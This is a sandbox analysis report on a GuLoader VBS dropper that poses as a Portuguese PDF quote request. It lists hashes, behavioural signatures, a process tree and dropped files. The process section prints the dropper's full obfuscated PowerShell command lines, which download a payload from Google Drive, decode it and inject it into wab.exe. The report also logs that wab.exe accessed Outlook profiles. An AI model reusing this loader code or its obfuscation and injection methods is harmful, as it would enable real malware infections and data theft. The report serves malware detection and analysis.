Analysis
- max time kernel: 146s
- max time network: 123s
- platform: windows7_x64
- resource: win7-20240221-en
- resource tags: arch:x64, arch:x86, image:win7-20240221-en, locale:en-us, os:windows7-x64, system
- submitted: 21/03/2024, 17:07
Static task: static1

Behavioral task: behavioral1
- Sample: Pedido de Orçamento (ISGP) EU - 0605PT·pdf.vbs
- Resource: win7-20240221-en

Behavioral task: behavioral2
- Sample: Pedido de Orçamento (ISGP) EU - 0605PT·pdf.vbs
- Resource: win10v2004-20240226-en
General
- Target: Pedido de Orçamento (ISGP) EU - 0605PT·pdf.vbs
- Size: 20KB
- MD5: 6c172c78edfa9cf3fbcee9e6417b4ec0
- SHA1: 56d554a6cfae0cbee45a32ac9e7f261c910cd046
- SHA256: 18a00a0da74be3d89a29bd856617a1703ee83646f39a51d70cf9d9017bd1ffad
- SHA512: 881216852a4049ce32387b221791b9ba7c75c4decb9b869430842a7a540f52ec1a24ae9a41550e0feb0dcf58731dcdd2dda9bcd45c798e0403af0fefaa751c27
- SSDEEP: 384:CE68ihBTZ6i8ahvxSIp27nn15lNmpK2kn70Vuz3+44GE8gT:H68ihdgi/LfIn3lNmpK2k7Sau4m8M
Malware Config
Signatures
- Guloader, Cloudeye
  A shellcode based downloader first seen in 2020.

- Accesses Microsoft Outlook profiles (1 TTPs, 3 IoCs)
  description | ioc | Process
  Key opened | \REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook | wab.exe
  Key opened | \REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook | wab.exe
  Key opened | \REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook | wab.exe

- Legitimate hosting services abused for malware hosting/C2 (1 TTPs, 3 IoCs)
  flow | ioc
  2 | drive.google.com
  3 | drive.google.com
  8 | drive.google.com

- Suspicious use of NtCreateThreadExHideFromDebugger (2 IoCs)
  pid | Process
  900 | wab.exe
  900 | wab.exe

- Suspicious use of NtSetInformationThreadHideFromDebugger (2 IoCs)
  pid | Process
  2076 | powershell.exe
  900 | wab.exe

- Suspicious use of SetThreadContext (1 IoCs)
  description | pid | Process | procid_target
  PID 2076 set thread context of 900 | 2076 | powershell.exe | 34

- Suspicious behavior: EnumeratesProcesses (3 IoCs)
  pid | Process
  1712 | powershell.exe
  2076 | powershell.exe
  2076 | powershell.exe

- Suspicious behavior: MapViewOfSection (1 IoCs)
  pid | Process
  2076 | powershell.exe

- Suspicious use of AdjustPrivilegeToken (3 IoCs)
  description | pid | Process
  Token: SeDebugPrivilege | 1712 | powershell.exe
  Token: SeDebugPrivilege | 2076 | powershell.exe
  Token: SeDebugPrivilege | 900 | wab.exe

- Suspicious use of WriteProcessMemory (20 IoCs)
  description | pid | Process | procid_target
  PID 1968 wrote to memory of 1712 | 1968 | WScript.exe | 28
  PID 1968 wrote to memory of 1712 | 1968 | WScript.exe | 28
  PID 1968 wrote to memory of 1712 | 1968 | WScript.exe | 28
  PID 1712 wrote to memory of 2360 | 1712 | powershell.exe | 30
  PID 1712 wrote to memory of 2360 | 1712 | powershell.exe | 30
  PID 1712 wrote to memory of 2360 | 1712 | powershell.exe | 30
  PID 1712 wrote to memory of 2076 | 1712 | powershell.exe | 32
  PID 1712 wrote to memory of 2076 | 1712 | powershell.exe | 32
  PID 1712 wrote to memory of 2076 | 1712 | powershell.exe | 32
  PID 1712 wrote to memory of 2076 | 1712 | powershell.exe | 32
  PID 2076 wrote to memory of 928 | 2076 | powershell.exe | 33
  PID 2076 wrote to memory of 928 | 2076 | powershell.exe | 33
  PID 2076 wrote to memory of 928 | 2076 | powershell.exe | 33
  PID 2076 wrote to memory of 928 | 2076 | powershell.exe | 33
  PID 2076 wrote to memory of 900 | 2076 | powershell.exe | 34
  PID 2076 wrote to memory of 900 | 2076 | powershell.exe | 34
  PID 2076 wrote to memory of 900 | 2076 | powershell.exe | 34
  PID 2076 wrote to memory of 900 | 2076 | powershell.exe | 34
  PID 2076 wrote to memory of 900 | 2076 | powershell.exe | 34
  PID 2076 wrote to memory of 900 | 2076 | powershell.exe | 34

- outlook_office_path (1 IoCs)
  description | ioc | Process
  Key opened | \REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook | wab.exe

- outlook_win_path (1 IoCs)
  description | ioc | Process
  Key opened | \REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook | wab.exe
Processes

- C:\Windows\System32\WScript.exe
  Command line: "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Pedido de Orçamento (ISGP) EU - 0605PT·pdf.vbs"
  PID: 1968
  Signatures:
  - Suspicious use of WriteProcessMemory

  - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Adgangsbegrnsnings Festoonery Overmost Inned Bondeknolde slaggebetonen #>;$Shunterne=(cmd /c set /A 115^^0);Function Rebribe ([String]$Snvreres){$Shunterne=[char][int]$Shunterne;$Exemplificational=$Shunterne+'ubstring';$Subpoenas=8;$Aromatiser=Audiles($Snvreres);For($Sagginess=7; $Sagginess -lt $Aromatiser; $Sagginess+=$Subpoenas){$Inrunning=$Snvreres.$Exemplificational.Invoke($Sagginess, 1);$Airbuses=$Airbuses+$Inrunning;}$Airbuses;}function Unscouring ($Descendent){. ($Phanerophyte) ($Descendent);}function Audiles ([String]$Kvindesynenes){$Stvstormene=$Kvindesynenes.Length-1;$Stvstormene;}$Bryanite=Rebribe 'GovernmTTilve erStagedmam disten MarginskubistefVllingseVandlbsrFerrihyr Bu,zeeiVandfornSuper,lgProfess ';$Twitchfire=Rebribe 'Sur,acthFlybooktE.tingutFis eripgranulisMicrolu: alaeot/Submax / Flle.kdFlygtn rBedeafpi Dor.thvTewlybleWobblyb.TvtninggVerdslio TidobloBlanktegBoks.bolDrukneteBefolkn.BrshandcGemytteo HairbamEtageby/ yrstehuDydspr,c Softba?ExcisioeFr.mhvexlubberlpEnliefsoDyknde.r,undayptSkattek=OvertrddCursthooNaturskwBejl.rtnlettermlBiradiaoKontoraaMajoritdSpil.ev&Bkkenfoi adver,dSeptem,=posn,rp1,nerler6 Wholese.atocri_churchwaDkketalPGraaligdAnnoncehF,rnticY Checkr1WhallocfskviserI ProfitNdejligtz MaattecPast amvCalpurndGinslinhUncathozOmstndee TheomadSilhu,tXnonvacuy Perfec2 Trustbuh.gmollYRepulsi6TringenmE iminaSTerm.nuP PromusrP.rotidWBioassaZFlannel ';$Phanerophyte=Rebribe 'OvermigiCentriseOutissuxFontane ';$Laureateships=Rebribe 'Fecundi$HydrospgPsil,selMoraviaoLrestnibGenlsunaSmigr,rlVer abi:LymphoiKshuddereOdelstinOphthaldBuffedetSpeak,te Ddsboe Anledn,=Microsc KaleyarSMenorrhtturpethaHeterolr sephirtMrtelv.-Ballfi.B Smokili AnsvartC,aracisSelvbioTChannelrnonimpeaUnconson Tel.trsFascinaf Rum.eneMonophor Stigm Bryll -PensionS P.openoRat kseu flytbrskrfe scGlyceroeResurfa Opinion$AfterfrTParafrawTripalmiShieldbtGall unc wastewhVasor ff ,ystemiF,refinrFlopslaeAfskyen C okery- DomsudDReflecte Climats SkosnutAmylcoui Bi,tannFinmekaaUntr.sttAttribriGowdnooo ErgotinLagerad Hit,anr$svrdsidU uitaren Insoc eIn,brinxWrithe tEksekutrEnam eraNa,rvaeomajon,er MalknidNervatiiwinegronTekstilaWarmersrImmanenyGiglots ';Unscouring (Rebribe ' B rrer$N,reocyg Lourd lStoppaboSpookinbFredso,a cosmoplbackfis:BafflemURetrodanBehovsueOphthalxOrdningtQa idamrSkinnebaLydredioStationrPolygamdAceto ui Aho,nsnSv,nglaa SimultrLedde.syroopbob= Takedo$SperonaePrecipinD.eriyov Padash: TawgikaSki,reepVaskepupKodificdVvskultaConvergtStrrelsa.emonet ') ;Unscouring (Rebribe 'nednormIpulpitimmacrocepCeral,ro irehnrindrejstSte han-Jack,olMUn ffraoSnorelodAustralufretfullIor opae Redecl ZarsvetB Ga,deniSculkintFupperns ,osereTRegaugircommuniaWarningnWommeras AllotyfStepnineUneffacrnonpro. ') ;$Unextraordinary=$Unextraordinary+'\Postmodernismen.Dis' ;Unscouring (Rebribe 'Syn ary$Ble eplg frumpilDe,lexio Unquicb Caliv.aTopvinkl Sinkni: SpindpDKons.kvi,unhmetsMari,olkSnrlivef nderpriSkrmreflFiskeli=Fireaar( ConcubTOpbringe Misbe sPrecritt Kamufl-AfsnitsPCorrodyaProteset ThermihGrenen, Politis$FladpulUCatapuln phthaleNiveaufxStorhertRetsf rrClowty,aAntiksao estlagrAlternedContextiAt mizenD,clariaBrss inrBortaukyAllival) En,our ') ;while (-not $Diskfil) {Unscouring (Rebribe ' Al.aynI Rne,olf Nondis M.lieub(Murbrok$ Jom ruKThi.cyaeAt ogennU drenddDemesnitZagsagueBrygsov.tre,varJTri unioKainitebPaas,ebS Makho,tEnsandaa Tonn,stDvrg,ksePar.ren provoke-VaskulreSpitstiq,aadene S,erona$SignoraB HelsefrLazarocyMohmbira zoransnInterpiiThall.ptUr.stifeLeptopr) Modici Famulus{ PrimrkSRackwortPerceptaMultiturGammel t Morato- GrosseSDefecatlHandlepePrede ieMorm.nspBug.ene Deducer1Genglde}TranspiePretranlJuntowes ConvereCymbalo{O.fensiSMumiesit Quer sa BrugerrEmmeryptlymphat-AabentvSSmaabrnlMacrocleParaplaeHrdstubpD,nkort gallinu1Bibacio;FavnfulUVreel.nnTi.smags,kibsliccitatiooWoodlanuUdpenslrKlkedesi ExponenPseudo,gProsili Perc ss$ed maspL Halvfja UnwinduSalu,ter Stetose Aylessa CapsultFlumme eEvigeafsPer phehFrigresiAch,llipKato ess.tropha} Skaktp ');Unscouring (Rebribe 'Stabelv$EternisgUdenlanlWitchesoIndgnedbTe,foldaOejentrlOv.rnat:PaspoleD Un.ecoiMentorssFulgentkPro,enifUnconceiVentri lStt,esy=Spi.alt( photomT Tee ieeUdpegelsTrus futBredbaa-Fastho,P TunganaReform.tSkolepahMorinud Noncont$DgenigtU recentn EilerteisotrimxDolorsht DolichrFor.attasilke.ooReaktiorUinitiadSaftfuliD,schronPostcosaVet,rinrmirthfuybenzogl)Hinande ') ;}Unscouring (Rebribe ' ,armsd$CyaninsgKdebrkelApprestoForttnib Llingea,piritulJocasta:Lskbel,F Nonwaxo Uns,ncrIsoseisrDecimale.xpertitFursto,nBran.ekisemifunnHui,ilegSvrdfstsTffelhenAksonomaxeromyrvBemandinAfhstensPassere Rst.ner=Bent.ic Bari.eiGAssyrereForsrgetUnovert-Reab,orCVisualioUr.acidnClarititDatabase .udiolnSchleict Ehlers Campoo$Op,akniU Pletson BloknieBiovaskxArkfdertF,lernerInitiataGrundtaoDoublecr BeskridHotelisi M,soponAloe ora.yjamaer Keba,sy Antipo ');Unscouring (Rebribe 'Tornebu$bogka ngTorturklAngola,o BrokfubOvergreaIterdrilImmig a:SumpbveFVelopmea pavonesSemi.rotAk,demil.oazervaHulmurseT.kredsgS bdruigTenpenceTraumatlTegnes,s Con.ige Co.sue Parring=Trkbasu ornatfo[Me iturS MiljfoyP nonces Indv itMischoseF.skemem ,landb.NormereCRooferso StyninnNonwrinvChinanteCinquefrBacteritB,trykk].undeck:Deponer:OedelaeFragtopsrOrdmello CheckhmF,skekuBRom,ossaStttepesR.ghthae snings6,isting4CiliussSTalliabt C.mengrPaleopsiSoftnern Uninteg Eutrop(Gascony$Datas iFL,venssoPiersarrImpersorsemisucebrenthjtEsk.drenKurve,eiMicroconEftervigUranbersHusarrenGadarenaHandelsvskaberen,alycansFritids) Pul.it ');Unscouring (Rebribe 'Arealer$Hyposcog Nonp,sl Sy.ehjoCartagebBarium a Afls,elJarbotf:DejklumVShopsskeJoshuahjB.ckersoPrsi.ervEgenhndeProaviarDecentrsAfbalankInstrukrChondroiamb.tionFie,dfigVen.ric Editore= Un.orr Rea to[ BjergnSv.siculy Windows.kvareltBe.gowneblokninmNonperc.ManslayTablative Dus efxcoranoctPornoma. Aa ekrE LinieanKvindesc PolyanoStrasbod.fskalliPhosphanAssurang andoo] Fungol:.yrilli: TredelA.ilbageSContrasCPsilotaI y.rerbISuspici.HudfletGKobberse Afsagtt Dine.eSHjlpemet F rkear UnderpiStaklesnGuarapog Skol,n(ned,mpe$VaselinFMegaloeaEncomicsIndogentArtificlZoolatraAfrmnineContempg TrotregtrencheeMaterialtetraiosSissieseAmtmanp) Bashjt ');Unscouring (Rebribe ' Selska$Dodec,hgFeriernl.ulfonaoUntransbTightkoaalabamil,pillen: VsentlUColludenMetacisdMegafoneStence.rFletfunfA.titheoJanisarr BeldamtExecutiiActivisflabor.eyUnchivai ngrebnFoss,tegUnretur=Epinici$KinetonV Contr,eBun,renjShinerroSomnilovDestille UnbarbrBevislisM.smerikBe,ismar VkstceiLeaklesn Tal engAntimec.PressrusAretalouForflgebBoghandsFeinschtBjrnetjr TabeloiAnbringnsubu,bagF.rjage(Steffan3Bactris3Conduce5Casefu 4.eshear7 Stregs8decimal,Plurilo3Baiki,c1 Overta6Cytostr7Planesh9 ,rille)Rheumat ');Unscouring $Underfortifying;"
    PID: 1712
    Signatures:
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory

    - C:\Windows\system32\cmd.exe
      Command line: "C:\Windows\system32\cmd.exe" /c set /A 115^^0
      PID: 2360

    - C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
      Command line: "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "<#Adgangsbegrnsnings Festoonery Overmost Inned Bondeknolde slaggebetonen #>;$Shunterne=(cmd /c set /A 115^^0);Function Rebribe ([String]$Snvreres){$Shunterne=[char][int]$Shunterne;$Exemplificational=$Shunterne+'ubstring';$Subpoenas=8;$Aromatiser=Audiles($Snvreres);For($Sagginess=7; $Sagginess -lt $Aromatiser; $Sagginess+=$Subpoenas){$Inrunning=$Snvreres.$Exemplificational.Invoke($Sagginess, 1);$Airbuses=$Airbuses+$Inrunning;}$Airbuses;}function Unscouring ($Descendent){. ($Phanerophyte) ($Descendent);}function Audiles ([String]$Kvindesynenes){$Stvstormene=$Kvindesynenes.Length-1;$Stvstormene;}$Bryanite=Rebribe 'GovernmTTilve erStagedmam disten MarginskubistefVllingseVandlbsrFerrihyr Bu,zeeiVandfornSuper,lgProfess ';$Twitchfire=Rebribe 'Sur,acthFlybooktE.tingutFis eripgranulisMicrolu: alaeot/Submax / Flle.kdFlygtn rBedeafpi Dor.thvTewlybleWobblyb.TvtninggVerdslio TidobloBlanktegBoks.bolDrukneteBefolkn.BrshandcGemytteo HairbamEtageby/ yrstehuDydspr,c Softba?ExcisioeFr.mhvexlubberlpEnliefsoDyknde.r,undayptSkattek=OvertrddCursthooNaturskwBejl.rtnlettermlBiradiaoKontoraaMajoritdSpil.ev&Bkkenfoi adver,dSeptem,=posn,rp1,nerler6 Wholese.atocri_churchwaDkketalPGraaligdAnnoncehF,rnticY Checkr1WhallocfskviserI ProfitNdejligtz MaattecPast amvCalpurndGinslinhUncathozOmstndee TheomadSilhu,tXnonvacuy Perfec2 Trustbuh.gmollYRepulsi6TringenmE iminaSTerm.nuP PromusrP.rotidWBioassaZFlannel ';$Phanerophyte=Rebribe 'OvermigiCentriseOutissuxFontane ';$Laureateships=Rebribe 'Fecundi$HydrospgPsil,selMoraviaoLrestnibGenlsunaSmigr,rlVer abi:LymphoiKshuddereOdelstinOphthaldBuffedetSpeak,te Ddsboe Anledn,=Microsc KaleyarSMenorrhtturpethaHeterolr sephirtMrtelv.-Ballfi.B Smokili AnsvartC,aracisSelvbioTChannelrnonimpeaUnconson Tel.trsFascinaf Rum.eneMonophor Stigm Bryll -PensionS P.openoRat kseu flytbrskrfe scGlyceroeResurfa Opinion$AfterfrTParafrawTripalmiShieldbtGall unc wastewhVasor ff ,ystemiF,refinrFlopslaeAfskyen C okery- DomsudDReflecte Climats SkosnutAmylcoui Bi,tannFinmekaaUntr.sttAttribriGowdnooo ErgotinLagerad Hit,anr$svrdsidU uitaren Insoc eIn,brinxWrithe tEksekutrEnam eraNa,rvaeomajon,er MalknidNervatiiwinegronTekstilaWarmersrImmanenyGiglots ';Unscouring (Rebribe ' B rrer$N,reocyg Lourd lStoppaboSpookinbFredso,a cosmoplbackfis:BafflemURetrodanBehovsueOphthalxOrdningtQa idamrSkinnebaLydredioStationrPolygamdAceto ui Aho,nsnSv,nglaa SimultrLedde.syroopbob= Takedo$SperonaePrecipinD.eriyov Padash: TawgikaSki,reepVaskepupKodificdVvskultaConvergtStrrelsa.emonet ') ;Unscouring (Rebribe 'nednormIpulpitimmacrocepCeral,ro irehnrindrejstSte han-Jack,olMUn ffraoSnorelodAustralufretfullIor opae Redecl ZarsvetB Ga,deniSculkintFupperns ,osereTRegaugircommuniaWarningnWommeras AllotyfStepnineUneffacrnonpro. ') ;$Unextraordinary=$Unextraordinary+'\Postmodernismen.Dis' ;Unscouring (Rebribe 'Syn ary$Ble eplg frumpilDe,lexio Unquicb Caliv.aTopvinkl Sinkni: SpindpDKons.kvi,unhmetsMari,olkSnrlivef nderpriSkrmreflFiskeli=Fireaar( ConcubTOpbringe Misbe sPrecritt Kamufl-AfsnitsPCorrodyaProteset ThermihGrenen, Politis$FladpulUCatapuln phthaleNiveaufxStorhertRetsf rrClowty,aAntiksao estlagrAlternedContextiAt mizenD,clariaBrss inrBortaukyAllival) En,our ') ;while (-not $Diskfil) {Unscouring (Rebribe ' Al.aynI Rne,olf Nondis M.lieub(Murbrok$ Jom ruKThi.cyaeAt ogennU drenddDemesnitZagsagueBrygsov.tre,varJTri unioKainitebPaas,ebS Makho,tEnsandaa Tonn,stDvrg,ksePar.ren provoke-VaskulreSpitstiq,aadene S,erona$SignoraB HelsefrLazarocyMohmbira zoransnInterpiiThall.ptUr.stifeLeptopr) Modici Famulus{ PrimrkSRackwortPerceptaMultiturGammel t Morato- GrosseSDefecatlHandlepePrede ieMorm.nspBug.ene Deducer1Genglde}TranspiePretranlJuntowes ConvereCymbalo{O.fensiSMumiesit Quer sa BrugerrEmmeryptlymphat-AabentvSSmaabrnlMacrocleParaplaeHrdstubpD,nkort gallinu1Bibacio;FavnfulUVreel.nnTi.smags,kibsliccitatiooWoodlanuUdpenslrKlkedesi ExponenPseudo,gProsili Perc ss$ed maspL Halvfja UnwinduSalu,ter Stetose Aylessa CapsultFlumme eEvigeafsPer phehFrigresiAch,llipKato ess.tropha} Skaktp ');Unscouring (Rebribe 'Stabelv$EternisgUdenlanlWitchesoIndgnedbTe,foldaOejentrlOv.rnat:PaspoleD Un.ecoiMentorssFulgentkPro,enifUnconceiVentri lStt,esy=Spi.alt( photomT Tee ieeUdpegelsTrus futBredbaa-Fastho,P TunganaReform.tSkolepahMorinud Noncont$DgenigtU recentn EilerteisotrimxDolorsht DolichrFor.attasilke.ooReaktiorUinitiadSaftfuliD,schronPostcosaVet,rinrmirthfuybenzogl)Hinande ') ;}Unscouring (Rebribe ' ,armsd$CyaninsgKdebrkelApprestoForttnib Llingea,piritulJocasta:Lskbel,F Nonwaxo Uns,ncrIsoseisrDecimale.xpertitFursto,nBran.ekisemifunnHui,ilegSvrdfstsTffelhenAksonomaxeromyrvBemandinAfhstensPassere Rst.ner=Bent.ic Bari.eiGAssyrereForsrgetUnovert-Reab,orCVisualioUr.acidnClarititDatabase .udiolnSchleict Ehlers Campoo$Op,akniU Pletson BloknieBiovaskxArkfdertF,lernerInitiataGrundtaoDoublecr BeskridHotelisi M,soponAloe ora.yjamaer Keba,sy Antipo ');Unscouring (Rebribe 'Tornebu$bogka ngTorturklAngola,o BrokfubOvergreaIterdrilImmig a:SumpbveFVelopmea pavonesSemi.rotAk,demil.oazervaHulmurseT.kredsgS bdruigTenpenceTraumatlTegnes,s Con.ige Co.sue Parring=Trkbasu ornatfo[Me iturS MiljfoyP nonces Indv itMischoseF.skemem ,landb.NormereCRooferso StyninnNonwrinvChinanteCinquefrBacteritB,trykk].undeck:Deponer:OedelaeFragtopsrOrdmello CheckhmF,skekuBRom,ossaStttepesR.ghthae snings6,isting4CiliussSTalliabt C.mengrPaleopsiSoftnern Uninteg Eutrop(Gascony$Datas iFL,venssoPiersarrImpersorsemisucebrenthjtEsk.drenKurve,eiMicroconEftervigUranbersHusarrenGadarenaHandelsvskaberen,alycansFritids) Pul.it ');Unscouring (Rebribe 'Arealer$Hyposcog Nonp,sl Sy.ehjoCartagebBarium a Afls,elJarbotf:DejklumVShopsskeJoshuahjB.ckersoPrsi.ervEgenhndeProaviarDecentrsAfbalankInstrukrChondroiamb.tionFie,dfigVen.ric Editore= Un.orr Rea to[ BjergnSv.siculy Windows.kvareltBe.gowneblokninmNonperc.ManslayTablative Dus efxcoranoctPornoma. Aa ekrE LinieanKvindesc PolyanoStrasbod.fskalliPhosphanAssurang andoo] Fungol:.yrilli: TredelA.ilbageSContrasCPsilotaI y.rerbISuspici.HudfletGKobberse Afsagtt Dine.eSHjlpemet F rkear UnderpiStaklesnGuarapog Skol,n(ned,mpe$VaselinFMegaloeaEncomicsIndogentArtificlZoolatraAfrmnineContempg TrotregtrencheeMaterialtetraiosSissieseAmtmanp) Bashjt ');Unscouring (Rebribe ' Selska$Dodec,hgFeriernl.ulfonaoUntransbTightkoaalabamil,pillen: VsentlUColludenMetacisdMegafoneStence.rFletfunfA.titheoJanisarr BeldamtExecutiiActivisflabor.eyUnchivai ngrebnFoss,tegUnretur=Epinici$KinetonV Contr,eBun,renjShinerroSomnilovDestille UnbarbrBevislisM.smerikBe,ismar VkstceiLeaklesn Tal engAntimec.PressrusAretalouForflgebBoghandsFeinschtBjrnetjr TabeloiAnbringnsubu,bagF.rjage(Steffan3Bactris3Conduce5Casefu 4.eshear7 Stregs8decimal,Plurilo3Baiki,c1 Overta6Cytostr7Planesh9 ,rille)Rheumat ');Unscouring $Underfortifying;"
      PID: 2076
      Signatures:
      - Suspicious use of NtSetInformationThreadHideFromDebugger
      - Suspicious use of SetThreadContext
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious behavior: MapViewOfSection
      - Suspicious use of AdjustPrivilegeToken
      - Suspicious use of WriteProcessMemory

      - C:\Windows\SysWOW64\cmd.exe
        Command line: "C:\Windows\system32\cmd.exe" /c set /A 115^^0
        PID: 928

      - C:\Program Files (x86)\windows mail\wab.exe
        Command line: "C:\Program Files (x86)\windows mail\wab.exe"
        PID: 900
        Signatures:
        - Accesses Microsoft Outlook profiles
        - Suspicious use of NtCreateThreadExHideFromDebugger
        - Suspicious use of NtSetInformationThreadHideFromDebugger
        - Suspicious use of AdjustPrivilegeToken
        - outlook_office_path
        - outlook_win_path
Network
MITRE ATT&CK Enterprise v15
Downloads

- C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
  Filesize: 344B
  MD5: 041f23af7d4457cc0ad5615db4d8d411
  SHA1: 59f348256c70326a68a5a0e8139ca540da6deb4c
  SHA256: 925889eb90023a8601cf340b7416fc8153d3bcc11ce2f3ecb40b32ea6a879742
  SHA512: e66b94dc0e28a8d65c402eb8def85e24b8fdda9071e1c87a002ba22c0427455e5b99c6c336108d45e177ec768576ce5ed1188fef42fa186c3b6b7836912018e0

- Filesize: 65KB
  MD5: ac05d27423a85adc1622c714f2cb6184
  SHA1: b0fe2b1abddb97837ea0195be70ab2ff14d43198
  SHA256: c6456e12e5e53287a547af4103e0397cb9697e466cf75844312dc296d43d144d
  SHA512: 6d0ef9050e41fbae680e0e59dd0f90b6ac7fea5579ef5708b69d5da33a0ece7e8b16574b58b17b64a34cc34a4ffc22b4a62c1ece61f36c4a11a0665e0536b90d

- Filesize: 468B
  MD5: 25ce7b393f49c7c35fc9bda0bc9fb915
  SHA1: 40038b21a508106fa528d4be80e5c67094014502
  SHA256: 59f4a91d276667fc04bf0021882e310d0ec64daf827df1cb987ebaf9b858d3de
  SHA512: bc43eb4c04da3106f21a37d637337a0233bbf65419a4c528fe9cfe82db52a6b85f7d99a966a0564d399a2de8c2bf75f4a4bdf83ed5e00958c5ba7a90881e5014

- Filesize: 4KB
  MD5: 50dd413bec30f0e90580cab4ead43871
  SHA1: 9323a2fffa9292219b75a826390a4b9a92ddc9c5
  SHA256: 910062babe14c2a8f72bbd65eb2424b7f5eb62d12722b4aa32985d07ff4a4ddf
  SHA512: 9deae5305ab9a902511696acf882c9c29d968de6c25607dfb86151ebeb2a8ffe8049cba10ed9723f0521bc88df72aa1e597501779ffc14a82c9b0918ca549190

- Filesize: 748B
  MD5: 074dc4bc79f77cda3cbd467980d6ed1d
  SHA1: 3ec35f6d8859aae74969093551aaa8a426b20844
  SHA256: 6ae66e8a1cfe1b489fa6165350027a6d2e4bf3ac87d49fc66d6a43de2bcd7fde
  SHA512: 6d8e44d82e817e87a4d43b9625555beb77a465e07c575dca131e628ebfddd9ad657eb57c50d86cfee98beff1ba97dd8da9515347cdedb6998d6ef78cda812826

- Filesize: 2KB
  MD5: 6a865d731fc3f1c152f884e5e1df9588
  SHA1: 4cfb4908e6548a350d7d14639507a21a54a212e2
  SHA256: f12e0eebbf69e71d91e8f9ed17fd5f225520c58b61f3de7116de60668f9e7fe2
  SHA512: 61e27ff3686179f45ad0e06e1875c2fc3ec5973cf7ed248936e09471d2eb427c26c00ef6dc5a78e7e831460508ffb8563a5807bfd3f2bc444498e168d34bc666

- C:\Users\Admin\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-2297530677-1229052932-2803917579-1000\0f5007522459c86e95ffcc62f32308f1_63be8c66-23f0-4400-84bb-c1a439222555
  Filesize: 46B
  MD5: d898504a722bff1524134c6ab6a5eaa5
  SHA1: e0fdc90c2ca2a0219c99d2758e68c18875a3e11e
  SHA256: 878f32f76b159494f5a39f9321616c6068cdb82e88df89bcc739bbc1ea78e1f9
  SHA512: 26a4398bffb0c0aef9a6ec53cd3367a2d0abf2f70097f711bbbf1e9e32fd9f1a72121691bb6a39eeb55d596edd527934e541b4defb3b1426b1d1a6429804dc61

- C:\Users\Admin\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-2297530677-1229052932-2803917579-1000\0f5007522459c86e95ffcc62f32308f1_63be8c66-23f0-4400-84bb-c1a439222555
  Filesize: 46B
  MD5: c07225d4e7d01d31042965f048728a0a
  SHA1: 69d70b340fd9f44c89adb9a2278df84faa9906b7
  SHA256: 8c136c7ae08020ad16fd1928e36ad335ddef8b85906d66b712fff049aa57dc9a
  SHA512: 23d3cea738e1abf561320847c39dadc8b5794d7bd8761b0457956f827a17ad2556118b909a3e6929db79980ccf156a6f58ac823cf88329e62417d2807b34b64b

- C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\YL3K1WDEVXVYMXV84ERM.temp
  Filesize: 7KB
  MD5: 4a286405fae162fb819820012bd51389
  SHA1: 66db4e7cfc28b332a662a14e1667a282117f04ba
  SHA256: 3bb59c15eb5b5328861b21d52ab388678d2b405e4e75c6ef061a5c4148b3494c
  SHA512: b8617f2dafff8ce9e1a25cf71a459523706092ca653a534222070c55894266a4607abe395d1784bebbdbf01f19f624e188a35c6e8d25c39eef79efa30fa33c19